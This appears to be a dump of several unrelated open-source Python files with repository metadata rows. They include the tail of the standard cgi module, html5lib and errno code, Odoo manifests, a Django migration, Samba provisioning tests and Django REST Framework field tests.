self.list.append(MiniFieldStorage(key, value))
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
self.list.append(MiniFieldStorage(key, value))
FieldStorageClass = None
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
# first line holds boundary ; ignore it, or check that
# b"--" + ib == first_line.strip() ?
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
# parser takes strings, not bytes
self.bytes_read += len(hdr_text)
parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
part = klass(self.fp, headers, ib, environ, keep_blank_values,
strict_parsing,self.limit-self.bytes_read,
self.encoding, self.errors)
self.bytes_read += part.bytes_read
self.list.append(part)
if self.bytes_read >= self.length:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
while 1:
if _read >= self.limit:
break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
encoding=self.encoding, newline = '\n')
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except os.error as msg:
print("os.error:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def escape(s, quote=None):
"""Deprecated API."""
warn("cgi.escape is deprecated, use html.escape instead",
PendingDeprecationWarning, stacklevel=2)
s = s.replace("&", "&") # Must be done first!
s = s.replace("<", "<")
s = s.replace(">", ">")
if quote:
s = s.replace('"', """)
return s
def valid_boundary(s, _vb_pattern=None):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| apache-2.0 | 648,747,184,364,241,300 | 32.544747 | 79 | 0.568757 | false |
clstl/servo | tests/wpt/css-tests/tools/html5lib/html5lib/treewalkers/__init__.py | 1229 | 2323 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to do
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
import sys
from ..utils import default_etree
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - The xml.dom.minidom DOM implementation
"pulldom" - The xml.dom.pulldom event stream
"etree" - A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
"lxml" - Optimized walker for lxml.etree
"genshi" - a Genshi stream
implementation - (Currently applies to the "etree" tree type only). A module
implementing the tree type e.g. xml.etree.ElementTree or
cElementTree."""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType in ("dom", "pulldom"):
name = "%s.%s" % (__name__, treeType)
__import__(name)
mod = sys.modules[name]
treeWalkerCache[treeType] = mod.TreeWalker
elif treeType == "genshi":
from . import genshistream
treeWalkerCache[treeType] = genshistream.TreeWalker
elif treeType == "lxml":
from . import lxmletree
treeWalkerCache[treeType] = lxmletree.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
| mpl-2.0 | 131,010,001,121,178,560 | 39.754386 | 80 | 0.63969 | false |
hurrinico/l10n-italy | l10n_it_ricevute_bancarie/__openerp__.py | 1 | 2257 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2012 Andrea Cometa.
# Email: [email protected]
# Web site: http://www.andreacometa.it
# Copyright (C) 2012 Agile Business Group sagl (<http://www.agilebg.com>)
# Copyright (C) 2012 Domsense srl (<http://www.domsense.com>)
# Copyright (C) 2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "Ricevute Bancarie",
'version': "8.0.1.3.0",
'author': "Odoo Community Association (OCA)",
'category': "Accounting & Finance",
'website': "http://www.odoo-italia.org",
'license': "AGPL-3",
'depends': [
'account_voucher',
'l10n_it_fiscalcode',
'account_due_list',
'base_iban',
'l10n_it_abicab'],
'data': [
"views/partner_view.xml",
"views/configuration_view.xml",
"riba_sequence.xml",
"views/wizard_accreditation.xml",
"views/wizard_unsolved.xml",
"views/riba_view.xml",
"views/account_view.xml",
"views/wizard_riba_issue.xml",
"views/wizard_riba_file_export.xml",
"views/account_config_view.xml",
"riba_workflow.xml",
"security/ir.model.access.csv",
],
'images': [],
'demo': ["demo/riba_demo.xml"],
'test': [
'test/riba_invoice.yml',
'test/issue_riba.yml',
'test/unsolved_riba.yml',
],
'installable': True,
}
| agpl-3.0 | -8,221,688,291,268,461,000 | 35.403226 | 78 | 0.57953 | false |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_errno.py | 5 | 1160 | #! /usr/bin/env python
"""Test the errno module
Roger E. Masse
"""
import errno
from test import support
import unittest
std_c_errors = frozenset(['EDOM', 'ERANGE'])
class ErrnoAttributeTests(unittest.TestCase):
def test_for_improper_attributes(self):
# No unexpected attributes should be on the module.
for error_code in std_c_errors:
self.assert_(hasattr(errno, error_code),
"errno is missing %s" % error_code)
def test_using_errorcode(self):
# Every key value in errno.errorcode should be on the module.
for value in errno.errorcode.values():
self.assert_(hasattr(errno, value), 'no %s attr in errno' % value)
class ErrorcodeTests(unittest.TestCase):
def test_attributes_in_errorcode(self):
for attribute in errno.__dict__.keys():
if attribute.isupper():
self.assert_(getattr(errno, attribute) in errno.errorcode,
'no %s attr in errno.errorcode' % attribute)
def test_main():
support.run_unittest(ErrnoAttributeTests, ErrorcodeTests)
if __name__ == '__main__':
test_main()
| mit | -8,687,603,400,186,094,000 | 28 | 78 | 0.630172 | false |
DarkArtek/FFXIVITAFC | news2/migrations/0001_initial.py | 1 | 1204 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-28 08:26
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='PostNews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Titolo Articolo')),
('text', models.TextField(verbose_name='Contenuto')),
('created_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Data di Creazione')),
('published_date', models.DateTimeField(blank=True, null=True, verbose_name='Data di Pubblicazione')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Autore')),
],
),
]
| unlicense | 7,943,794,929,761,284,000 | 37.83871 | 143 | 0.645349 | false |
shingonoide/odoo | addons/hr_contract/__openerp__.py | 260 | 1834 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Employee Contracts',
'version': '1.0',
'category': 'Human Resources',
'description': """
Add all information on the employee form to manage contracts.
=============================================================
* Contract
* Place of Birth,
* Medical Examination Date
* Company Vehicle
You can assign several contracts per employee.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/employees',
'depends': ['base_action_rule', 'hr'],
'data': [
'security/ir.model.access.csv',
'hr_contract_view.xml',
'hr_contract_data.xml',
'base_action_rule_view.xml',
],
'demo': [],
'test': ['test/test_hr_contract.yml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -7,011,756,181,744,282,000 | 34.269231 | 78 | 0.580153 | false |
sYnfo/samba-1 | python/samba/tests/upgradeprovisionneeddc.py | 32 | 7461 | # Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <[email protected]> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Tests for samba.upgradeprovision that need a DC."""
import os
import re
import shutil
from samba import param
from samba.credentials import Credentials
from samba.auth import system_session
from samba.provision import getpolicypath,find_provision_key_parameters
from samba.upgradehelpers import (get_paths, get_ldbs,
identic_rename,
updateOEMInfo, getOEMInfo, update_gpo,
delta_update_basesamdb,
update_dns_account_password,
search_constructed_attrs_stored,
increment_calculated_keyversion_number)
from samba.tests import env_loadparm, TestCaseInTempDir
from samba.tests.provision import create_dummy_secretsdb
import ldb
def dummymessage(a=None, b=None):
pass
smb_conf_path = "%s/%s/%s" % (os.environ["SELFTEST_PREFIX"], "ad_dc_ntvfs", "etc/smb.conf")
class UpgradeProvisionBasicLdbHelpersTestCase(TestCaseInTempDir):
"""Some simple tests for individual functions in the provisioning code.
"""
def test_get_ldbs(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
get_ldbs(paths, creds, system_session(), lp)
def test_find_key_param(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
rootdn = "dc=samba,dc=example,dc=com"
ldbs = get_ldbs(paths, creds, system_session(), lp)
names = find_provision_key_parameters(ldbs.sam, ldbs.secrets, ldbs.idmap,
paths, smb_conf_path, lp)
self.assertEquals(names.realm, "SAMBA.EXAMPLE.COM")
self.assertEquals(str(names.rootdn).lower(), rootdn.lower())
self.assertNotEquals(names.policyid_dc, None)
self.assertNotEquals(names.ntdsguid, "")
class UpgradeProvisionWithLdbTestCase(TestCaseInTempDir):
def _getEmptyDbName(self):
return os.path.join(self.tempdir, "sam.ldb")
def setUp(self):
super(UpgradeProvisionWithLdbTestCase, self).setUp()
paths = get_paths(param, None, smb_conf_path)
self.creds = Credentials()
self.lp = env_loadparm()
self.creds.guess(self.lp)
self.paths = paths
self.ldbs = get_ldbs(paths, self.creds, system_session(), self.lp)
self.names = find_provision_key_parameters(self.ldbs.sam,
self.ldbs.secrets, self.ldbs.idmap, paths, smb_conf_path,
self.lp)
self.referencedb = create_dummy_secretsdb(
os.path.join(self.tempdir, "ref.ldb"))
def test_search_constructed_attrs_stored(self):
hashAtt = search_constructed_attrs_stored(self.ldbs.sam,
self.names.rootdn,
["msds-KeyVersionNumber"])
self.assertFalse(hashAtt.has_key("msds-KeyVersionNumber"))
def test_increment_calculated_keyversion_number(self):
dn = "CN=Administrator,CN=Users,%s" % self.names.rootdn
# We conctruct a simple hash for the user administrator
hash = {}
# And we want the version to be 140
hash[dn.lower()] = 140
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
# This function should not decrement the version
hash[dn.lower()] = 130
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
def test_identic_rename(self):
rootdn = "DC=samba,DC=example,DC=com"
guestDN = ldb.Dn(self.ldbs.sam, "CN=Guest,CN=Users,%s" % rootdn)
identic_rename(self.ldbs.sam, guestDN)
res = self.ldbs.sam.search(expression="(name=Guest)", base=rootdn,
scope=ldb.SCOPE_SUBTREE, attrs=["dn"])
self.assertEquals(len(res), 1)
self.assertEquals(str(res[0]["dn"]), "CN=Guest,CN=Users,%s" % rootdn)
def test_delta_update_basesamdb(self):
dummysampath = self._getEmptyDbName()
delta_update_basesamdb(self.paths.samdb, dummysampath,
self.creds, system_session(), self.lp,
dummymessage)
def test_update_gpo_simple(self):
dir = getpolicypath(self.paths.sysvol, self.names.dnsdomain,
self.names.policyid)
shutil.rmtree(dir)
self.assertFalse(os.path.isdir(dir))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
self.assertTrue(os.path.isdir(dir))
def test_update_gpo_acl(self):
path = os.path.join(self.tempdir, "testupdategpo")
save = self.paths.sysvol
self.paths.sysvol = path
os.mkdir(path)
os.mkdir(os.path.join(path, self.names.dnsdomain))
os.mkdir(os.path.join(os.path.join(path, self.names.dnsdomain),
"Policies"))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
shutil.rmtree(path)
self.paths.sysvol = save
def test_getOEMInfo(self):
realm = self.lp.get("realm")
basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(oem, "")
def test_update_dns_account(self):
update_dns_account_password(self.ldbs.sam, self.ldbs.secrets,
self.names)
def test_updateOEMInfo(self):
realm = self.lp.get("realm")
basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
updateOEMInfo(self.ldbs.sam, basedn)
oem2 = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(str(oem), str(oem2))
self.assertTrue(re.match(".*upgrade to.*", str(oem2)))
def tearDown(self):
for name in ["ref.ldb", "secrets.ldb", "secrets.tdb", "secrets.tdb.bak", "secrets.ntdb", "sam.ldb"]:
path = os.path.join(self.tempdir, name)
if os.path.exists(path):
os.unlink(path)
super(UpgradeProvisionWithLdbTestCase, self).tearDown()
| gpl-3.0 | -8,156,522,751,536,589,000 | 40.681564 | 108 | 0.602332 | false |
johnraz/django-rest-framework | tests/test_fields.py | 1 | 54851 | import datetime
import os
import uuid
from decimal import Decimal
import pytest
from django.http import QueryDict
from django.test import TestCase, override_settings
from django.utils import six, timezone
import rest_framework
from rest_framework import serializers
# Tests for field keyword arguments and core functionality.
# ---------------------------------------------------------
class TestEmpty:
"""
Tests for `required`, `allow_null`, `allow_blank`, `default`.
"""
def test_required(self):
"""
By default a field must be included in the input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation()
assert exc_info.value.detail == ['This field is required.']
def test_not_required(self):
"""
If `required=False` then a field may be omitted from the input.
"""
field = serializers.IntegerField(required=False)
with pytest.raises(serializers.SkipField):
field.run_validation()
def test_disallow_null(self):
"""
By default `None` is not a valid input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(None)
assert exc_info.value.detail == ['This field may not be null.']
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.IntegerField(allow_null=True)
output = field.run_validation(None)
assert output is None
def test_disallow_blank(self):
"""
By default '' is not a valid input.
"""
field = serializers.CharField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation('')
assert exc_info.value.detail == ['This field may not be blank.']
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.CharField(allow_blank=True)
output = field.run_validation('')
assert output == ''
def test_default(self):
"""
If `default` is set, then omitted values get the default input.
"""
field = serializers.IntegerField(default=123)
output = field.run_validation()
assert output is 123
class TestSource:
def test_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='other')
serializer = ExampleSerializer(data={'example_field': 'abc'})
assert serializer.is_valid()
assert serializer.validated_data == {'other': 'abc'}
def test_redundant_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `source='example_field'` on field "
"'CharField' in serializer 'ExampleSerializer', because it is the "
"same as the field name. Remove the `source` keyword argument."
)
def test_callable_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable')
class ExampleInstance(object):
def example_callable(self):
return 'example callable value'
serializer = ExampleSerializer(ExampleInstance())
assert serializer.data['example_field'] == 'example callable value'
def test_callable_source_raises(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable', read_only=True)
class ExampleInstance(object):
def example_callable(self):
raise AttributeError('method call failed')
with pytest.raises(ValueError) as exc_info:
serializer = ExampleSerializer(ExampleInstance())
serializer.data.items()
assert 'method call failed' in str(exc_info.value)
class TestReadOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
read_only = serializers.ReadOnlyField()
writable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_read_only(self):
"""
Read-only serializers.should not be included in validation.
"""
data = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'writable': 456}
def test_serialize_read_only(self):
"""
Read-only serializers.should be serialized.
"""
instance = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'read_only': 123, 'writable': 456}
class TestWriteOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
write_only = serializers.IntegerField(write_only=True)
readable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_write_only(self):
"""
Write-only serializers.should be included in validation.
"""
data = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'write_only': 123, 'readable': 456}
def test_serialize_write_only(self):
"""
Write-only serializers.should not be serialized.
"""
instance = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'readable': 456}
class TestInitial:
def setup(self):
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=123)
blank_field = serializers.IntegerField()
self.serializer = TestSerializer()
def test_initial(self):
"""
Initial values should be included when serializing a new representation.
"""
assert self.serializer.data == {
'initial_field': 123,
'blank_field': None
}
class TestInitialWithCallable:
def setup(self):
def initial_value():
return 123
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=initial_value)
self.serializer = TestSerializer()
def test_initial_should_accept_callable(self):
"""
Follows the default ``Field.initial`` behaviour where they accept a
callable to produce the initial value"""
assert self.serializer.data == {
'initial_field': 123,
}
class TestLabel:
def setup(self):
class TestSerializer(serializers.Serializer):
labeled = serializers.IntegerField(label='My label')
self.serializer = TestSerializer()
def test_label(self):
"""
A field's label may be set with the `label` argument.
"""
fields = self.serializer.fields
assert fields['labeled'].label == 'My label'
class TestInvalidErrorKey:
def setup(self):
class ExampleField(serializers.Field):
def to_native(self, data):
self.fail('incorrect')
self.field = ExampleField()
def test_invalid_error_key(self):
"""
If a field raises a validation error, but does not have a corresponding
error message, then raise an appropriate assertion error.
"""
with pytest.raises(AssertionError) as exc_info:
self.field.to_native(123)
expected = (
'ValidationError raised by `ExampleField`, but error key '
'`incorrect` does not exist in the `error_messages` dictionary.'
)
assert str(exc_info.value) == expected
class TestBooleanHTMLInput:
def test_empty_html_checkbox(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField()
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
def test_empty_html_checkbox_not_required(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField, even if the field is required=False.
"""
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
class TestHTMLInput:
def test_empty_html_charfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(default='happy')
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 'happy'}
def test_empty_html_charfield_without_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_without_default_not_required(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_blank=True, required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_integerfield(self):
class TestSerializer(serializers.Serializer):
message = serializers.IntegerField(default=123)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': 123}
def test_empty_html_uuidfield_with_default(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(default=uuid.uuid4)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == ['message']
def test_empty_html_uuidfield_with_optional(self):
class TestSerializer(serializers.Serializer):
message = serializers.UUIDField(required=False)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert list(serializer.validated_data.keys()) == []
def test_empty_html_charfield_allow_null(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': None}
def test_empty_html_datefield_allow_null(self):
class TestSerializer(serializers.Serializer):
expiry = serializers.DateField(allow_null=True)
serializer = TestSerializer(data=QueryDict('expiry='))
assert serializer.is_valid()
assert serializer.validated_data == {'expiry': None}
def test_empty_html_charfield_allow_null_allow_blank(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True, allow_blank=True)
serializer = TestSerializer(data=QueryDict('message='))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_required_false(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(required=False)
serializer = TestSerializer(data=QueryDict(''))
assert serializer.is_valid()
assert serializer.validated_data == {}
def test_querydict_list_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&scores=3'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1, 3]}
def test_querydict_list_input_only_one_input(self):
class TestSerializer(serializers.Serializer):
scores = serializers.ListField(child=serializers.IntegerField())
serializer = TestSerializer(data=QueryDict('scores=1&'))
assert serializer.is_valid()
assert serializer.validated_data == {'scores': [1]}
class TestCreateOnlyDefault:
def setup(self):
default = serializers.CreateOnlyDefault('2001-01-01')
class TestSerializer(serializers.Serializer):
